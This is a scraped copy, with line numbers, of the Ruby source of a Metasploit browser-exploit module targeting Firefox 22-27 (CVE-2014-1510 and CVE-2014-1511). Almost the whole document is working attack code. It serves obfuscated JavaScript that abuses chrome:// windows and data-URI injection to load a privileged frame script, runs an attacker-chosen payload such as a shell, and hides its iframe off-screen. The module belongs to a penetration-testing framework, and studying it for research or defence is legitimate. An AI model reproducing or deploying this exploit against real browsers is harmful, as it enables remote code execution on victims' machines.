Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/exploitation/jsobfu'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ExcellentRanking
10

11
  include Msf::Exploit::Remote::BrowserExploitServer
12
  include Msf::Exploit::Remote::BrowserAutopwn
13
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
14

15
  autopwn_info({
16
    :ua_name    => HttpClients::FF,
17
    :ua_minver  => "22.0",
18
    :ua_maxver  => "27.0",
19
    :javascript => true,
20
    :rank       => ExcellentRanking
21
  })
22

23
  def initialize(info = {})
24
    super(update_info(info,
25
      'Name'           => 'Firefox WebIDL Privileged Javascript Injection',
26
      'Description'    => %q{
27
        This exploit gains remote code execution on Firefox 22-27 by abusing two
28
        separate privilege escalation vulnerabilities in Firefox's Javascript
29
        APIs.
30
      },
31
      'License' => MSF_LICENSE,
32
      'Author'  => [
33
        'Marius Mlynski', # discovery and pwn2own exploit
34
        'joev' # metasploit module
35
      ],
36
      'DisclosureDate' => '2014-03-17',
37
      'References' => [
38
        ['CVE', '2014-1510'], # open chrome:// url in iframe
39
        ['CVE', '2014-1511']  # bypass popup blocker to load bare ChromeWindow
40
      ],
41
      'Targets' => [
42
        [
43
          'Universal (Javascript XPCOM Shell)', {
44
            'Platform' => 'firefox',
45
            'Arch' => ARCH_FIREFOX
46
          }
47
        ],
48
        [
49
          'Native Payload', {
50
            'Platform' => %w{ java linux osx solaris win },
51
            'Arch'     => ARCH_ALL
52
          }
53
        ]
54
      ],
55
      'DefaultTarget' => 0,
56
      'BrowserRequirements' => {
57
        :source  => 'script',
58
        :ua_name => HttpClients::FF,
59
        :ua_ver  => lambda { |ver| ver.to_i.between?(22, 27) }
60
      }
61
    ))
62

63
    register_options([
64
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
65
    ])
66
  end
67

68
  def on_request_exploit(cli, request, target_info)
69
    send_response_html(cli, generate_html(target_info))
70
  end
71

72
  def generate_html(target_info)
73
    key = Rex::Text.rand_text_alpha(5 + rand(12))
74
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
75
    r = Rex::Text.rand_text_alpha(5 + rand(12))
76
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
77
    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
78
               "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
79
               "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
80

81
    js = js_obfuscate %Q|
82
      var opts = #{JSON.unparse(opts)};
83
      var key = opts['#{key}'];
84

85
      // Load the chrome-privileged browser XUL script into an iframe
86
      var c = new mozRTCPeerConnection;
87
      c.createOffer(function(){},function(){
88
        window.open('chrome://browser/content/browser.xul', '#{frame}');
89
        step1();
90
      });
91

92
      // Inject a data: URI into an internal frame inside of the browser
93
      // XUL script to pop open a new window with the chrome flag to prevent
94
      // the new window from being wrapped with browser XUL;
95
      function step1() {
96
        var clear = setInterval(function(){
97

98
          // throws until frames[0].frames[2] is available (when chrome:// iframe loads)
99
          frames[0].frames[2].location;
100

101
          // we base64 this to avoid the script tag screwing up things when obfuscated
102
          frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
103
          clearInterval(clear);
104
          setTimeout(step2, 100);
105
        },10);
106
      }
107

108
      // Step 2: load the chrome-level window up with a data URI, which
109
      // gives us same-origin. Make sure to load an "<iframe mozBrowser>"
110
      // into the frame, since that will respond to our messageManager
111
      // (this is important later)
112
      function step2() {
113
        var clear = setInterval(function(){
114
          top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
115
                             'src="about:blank"></iframe></body></html>';
116
          clearInterval(clear);
117
          setTimeout(step3, 100);
118
        }, 10);
119
      }
120

121
      function step3() {
122
        var clear = setInterval(function(){
123
          if (!frames[0]) return; // will throw until the frame is accessible
124
          top.vvv.messageManager.loadFrameScript('data:,'+key, false);
125
          clearInterval(clear);
126
          setTimeout(function(){top.vvv.close();}, 100);
127
        }, 10);
128
      }
129
    |
130

131
    %Q|
132
      <!doctype html>
133
      <html>
134
        <body>
135
          <iframe id='#{frame}' name='#{frame}'
136
                  style='position:absolute;left:-9999999px;height:1px;width:1px;'>
137
          </iframe>
138
          <script>
139
            #{js}
140
          </script>
141
          #{datastore['CONTENT']}
142
        </body>
143
      </html>
144
    |
145
  end
146
end
147

148

149